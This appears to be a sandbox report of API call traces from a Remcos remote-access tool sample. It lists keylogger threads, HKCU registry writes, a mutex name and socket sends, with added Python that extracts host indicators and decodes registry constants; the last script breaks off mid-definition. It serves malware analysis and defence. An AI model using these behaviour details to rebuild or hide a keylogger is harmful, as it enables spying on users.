• FindCloseChangeNotification.KERNEL32(00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C477
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
• String ID:
• API String ID: 1087594267-0
• Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
• Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
• GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: c29bde4569c61d98e9b6f390dd59a5ca70510856732b3a4caaaef978b86e8a1d
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: 93F0F669587340BCFA12C6B41E41EF75FCC8B67663B101A5EE200C73A3D895870683F6
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: !D@$NG
• API String ID: 180926312-2721294649
• Opcode ID: 7d01a5ab84d0564d86ffae43eb523a0b345e9c92a79071e0b51248b8e8200ff1
• Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
• Opcode Fuzzy Hash: 7d01a5ab84d0564d86ffae43eb523a0b345e9c92a79071e0b51248b8e8200ff1
• Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
• CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
• CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 2c19bd04d36dc34c7690185316a0ca742d4447cd05569385128c134b60368c61
• Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
• Opcode Fuzzy Hash: 2c19bd04d36dc34c7690185316a0ca742d4447cd05569385128c134b60368c61
• Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
• CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 00404F94
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
• Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
• Opcode Fuzzy Hash: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
• Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
• RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
• RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
• Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
• Opcode Fuzzy Hash: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
• Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
• CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
• FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
• String ID:
• API String ID: 2579639479-0
• Opcode ID: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
• Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
• Opcode Fuzzy Hash: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
• Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
• FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C4E5
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$ChangeCloseCreateFindNotificationReadSize
• String ID:
• API String ID: 2135649906-0
• Opcode ID: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
• Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
• Opcode Fuzzy Hash: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
• Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
• GetLastError.KERNEL32 ref: 0040D083
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-V052BG
• API String ID: 1925916568-2991731777
• Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
• Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
• Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
• Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
Uniqueness
Uniqueness Score: -1.00%
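The function entries in this listing are the raw export of the Joe Sandbox IDA plugin, and only a few of them carry triage value: the CreateMutexA/GetLastError pair whose function references the string Rmc-V052BG (the classic create-then-check-ERROR_ALREADY_EXISTS single-instance test, and a mutex name a responder can look for on a suspect host), the RegCreateKeyA call with 80000001 (HKEY_CURRENT_USER) followed by RegSetValueExA (its argument list even carries the version string 4.9.4 Pro), and the thread-starting functions tagged with "KeepAlive | Enabled | Timeout:" and "Offline Keylogger Started". The Python below is an added example for this page, not Joe Sandbox or Remcos code: it parses this listing format into records, tags those behaviours and collects the host-triage strings. The tag names and matching rules are the example's own assumptions, and the embedded SAMPLE is an excerpt of three entries copied from the listing above (one Associated line keeps the "Download File" link caption the HTML export leaves behind, so the parser shows how to strip it).

```python
"""Parse Joe Sandbox function-analysis listings (the APIs / Strings / Similarity /
Uniqueness blocks the IDA plugin exports) into records, tag the behaviours this report
shows and pull out host-triage strings. Added example for this page, not Joe Sandbox or
Remcos code; SAMPLE excerpts three entries from the listing, and the tag names and
rules in tag_entry() are this example's own assumptions."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
• CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 00404F94
Memory Dump Source
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
Uniqueness Score: -1.00%
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
• RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
• RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
• GetLastError.KERNEL32 ref: 0040D083
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-V052BG
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})$")
STR_RE = re.compile(r"^•\s*(.*?),\s*xrefs:\s*([0-9A-Fa-f ,]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")
ApiCall = namedtuple("ApiCall", "name module args ref")  # ref = call-site address in the dump

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, [xref addresses])
    meta: dict = field(default_factory=dict)     # Similarity / dump-source key: value (last wins)
    uniqueness: "float | None" = None

def parse_listing(text):
    """One FunctionEntry per 'APIs' block; text before the first block is discarded."""
    entries, cur, section = [], FunctionEntry(), None
    lines = (l.strip().removesuffix("Download File").rstrip() for l in text.splitlines())
    for line in filter(None, lines):  # 'Download File' is a link caption the HTML export leaves behind
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif m := SCORE_RE.match(line):
            cur.uniqueness = float(m[1])
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m[3].split(",")] if m[3] else []
            cur.apis.append(ApiCall(m[1], m[2], args, m[4]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m[1].strip(), [x for x in re.split(r"[,\s]+", m[2]) if x]))
        elif m := KV_RE.match(line):
            cur.meta[m[1].strip()] = m[2].strip()
    return entries

def tag_entry(e):
    """Behaviour tags (this example's own labels) for one parsed function."""
    names = {a.name for a in e.apis}
    strs = [s for s, _ in e.strings] + [e.meta.get("String ID", "")]
    tags = []
    if names & {"CreateMutexA", "CreateMutexW"} and "GetLastError" in names:
        tags.append("single_instance_mutex")  # create, then test for ERROR_ALREADY_EXISTS
    if any(s.startswith("Rmc-") for s in strs):
        tags.append("remcos_mutex_name")
    if any("KeepAlive" in s for s in strs):
        tags.append("c2_keepalive")
    if any(a.name.startswith("RegSetValueEx") for a in e.apis) and any(
            a.name.startswith("RegCreateKey") and a.args[:1] == ["80000001"] for a in e.apis):
        tags.append("hkcu_registry_write")  # 0x80000001 == HKEY_CURRENT_USER
    return tags

def extract_iocs(entries):
    """Mutex names, plus the string the HKCU-writing function references (likely a value name)."""
    iocs = {"mutex": [], "registry_string": []}
    for e in entries:
        tags, sid = tag_entry(e), e.meta.get("String ID", "")
        if "remcos_mutex_name" in tags:
            iocs["mutex"].append(sid)
        if "hkcu_registry_write" in tags and sid:
            iocs["registry_string"].append(sid)
    return iocs
```

Run `extract_iocs(parse_listing(SAMPLE))` and the result is the mutex name Rmc-V052BG and the registry string pth_unenc; feed the whole exported listing instead of SAMPLE to cover every function in the report. The String ID line is used alongside the Strings section because the export often records the referenced string only in the Similarity block, as the mutex and registry entries above do.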

APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
• Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
• Opcode Fuzzy Hash: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
• Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
• RegCloseKey.KERNEL32(?), ref: 004135F2
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
• Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
• Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
• Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
• RegCloseKey.KERNEL32(00000000), ref: 00413738
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: b53d5430339f24b3f35949c1b6b46cee90247795c41e72649518dd5831c8e0a8
• Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
• Opcode Fuzzy Hash: b53d5430339f24b3f35949c1b6b46cee90247795c41e72649518dd5831c8e0a8
• Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
• _free.LIBCMT ref: 0044F41A
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: EnvironmentStrings$Free_free
• String ID:
• API String ID: 2716640707-0
• Opcode ID: 8c830847f627c56b18221293452c170e3b7caa4654d8c11f7beef3e49baffa3a
• Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
• Opcode Fuzzy Hash: 8c830847f627c56b18221293452c170e3b7caa4654d8c11f7beef3e49baffa3a
• Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
• RegCloseKey.KERNEL32(?), ref: 00413592
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
• Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
• RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
• Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
• RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
• RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
• Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
Uniqueness

Uniqueness Score: -1.00%

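The registry entries above list raw hexadecimal stack slots, so a reviewer has to resolve the root handle (80000001), the access mask (00020019) and the value type passed to RegSetValueExA (00000004) by hand to see that these functions read under HKEY_CURRENT_USER with KEY_READ and that the last one writes a REG_DWORD under HKEY_CURRENT_USER. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the "• Api.Module(args), ref: addr" lines exactly as they appear in this section, decodes the constants from winreg.h/winnt.h, and flags writes that follow a key opened or created under HKCU. The SAMPLE_LINES input is constructed by copying the API lines from the entries above; the function and variable names are the example's own.

```python
"""Decode registry API calls from Joe Sandbox function entries (added example)."""
import re
from dataclasses import dataclass

# Constructed input: the API lines copied from the function entries above.
SAMPLE_LINES = """
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
• RegCloseKey.KERNEL32(?), ref: 004135F2
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
• RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
• RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
"""

# Predefined root handles (winreg.h).
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
              0x80000005: "HKEY_CURRENT_CONFIG"}
# Composite rights are matched first, otherwise the mask is split into bits (winnt.h).
KEY_COMPOSITES = [(0x000F003F, "KEY_ALL_ACCESS"), (0x00020019, "KEY_READ"), (0x00020006, "KEY_WRITE")]
KEY_BITS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
            (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
            (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x10000, "DELETE"),
            (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER")]
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
# Parameter counts from the documented prototypes. The sandbox prints raw stack
# slots, so anything past this count is leftover stack data, not a parameter.
ARITY = {"RegOpenKeyExA": 5, "RegCreateKeyA": 3, "RegQueryValueExA": 6,
         "RegSetValueExA": 6, "RegCloseKey": 1}

LINE_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # one int per stack slot, None where the report prints '?'
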